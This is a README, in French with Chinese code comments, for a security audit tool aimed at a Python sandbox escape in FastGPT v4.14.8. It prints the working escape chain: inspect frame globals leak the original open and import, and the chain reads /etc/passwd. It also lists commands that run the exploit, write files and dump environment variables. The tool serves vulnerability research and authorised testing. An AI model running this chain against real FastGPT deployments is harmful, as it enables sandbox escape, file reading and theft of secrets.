
FastGPT — outil d'audit de chaîne d'évasion de sandbox Python (lié à CVE-2026-32128, chaîne d'inspection v4.14.8)
Outil d'audit des chaînes d'évasion du sandbox Python FastGPT.
Le nœud « exécution de code » du workflow FastGPT soumet le code Python de l'utilisateur à un sandbox isolé pour exécution. La protection du sandbox en v4.14.8 est une couche purement Python (liste noire de modules + vérification AST + garde d'open + garde d'import). Cet outil détecte et valide les chaînes de contournement de ces protections :
import inspect # inspect 不在 _DANGEROUS_STDLIB 黑名单
g = inspect.currentframe().f_back.f_globals # AST 检查不拦单下划线帧属性
f = g['_original_open'](https://github.com/qianlijaingshan/fastgpt-sandbox-audit/blob/main/%27/etc/passwd%27) # 模块全局暴露原始 open 引用
imp = g['_original_import'] # 模块全局暴露原始 __import__ 引用
| Version | Architecture | Statut |
|---|
| v4.14.7 | NestJS + Fastify + seccomp | CVE-2026-32128 (remappage de stdout via fcntl) |
| v4.14.8 | Bun + Hono + worker.py | Chaîne d'évasion décrite ici, évasion complète (fichiers arbitraires dans le conteneur + mouvement latéral réseau) |
| main | Go native chroot + seccomp | La couche Python est également contournée ; le chroot restreint finalement au conteneur |
Uniquement la bibliothèque standard, Python 3.8+.
# 静态检测 worker.py 防护配置(不执行 payload)
python3 fastgpt-sandbox-audit.py --check
# 对真实 worker.py 跑完整逃逸链(读 /etc/passwd + 写文件)
python3 fastgpt-sandbox-audit.py --exploit
# 导出环境变量(前 20 个 key)
python3 fastgpt-sandbox-audit.py --dump
# 指定 worker.py 路径
python3 fastgpt-sandbox-audit.py --worker /path/to/worker.py --exploit
--exploit nécessite un worker.py réel (le processus worker Python du sandbox FastGPT v4.14.8) ; par défaut il lit ./worker.py dans le répertoire courant et soumet le payload via son propre protocole JSON sur stdin ({"type":"init"} → {"type":"task","code":...}).
Sortie du mode --check :
=== fastgpt-sandbox-audit: 防护配置检查 ===
[风险] inspect 不在 _DANGEROUS_STDLIB 黑名单 -> 可 import
[风险] AST 检查未拦截 f_globals 属性
[风险] 模块全局暴露 _original_open -> 可被 f_globals 窃取
[风险] 模块全局暴露 _original_import -> 可被 f_globals 窃取
[提示] worker.py 无 seccomp (4.14.8+ 纯 Python 防护)
Cet outil est destiné uniquement à la recherche en sécurité et aux tests de sécurité autorisés. Tester les systèmes d'autrui sans autorisation peut enfreindre les lois et réglementations ; vous assumez l'entière responsabilité.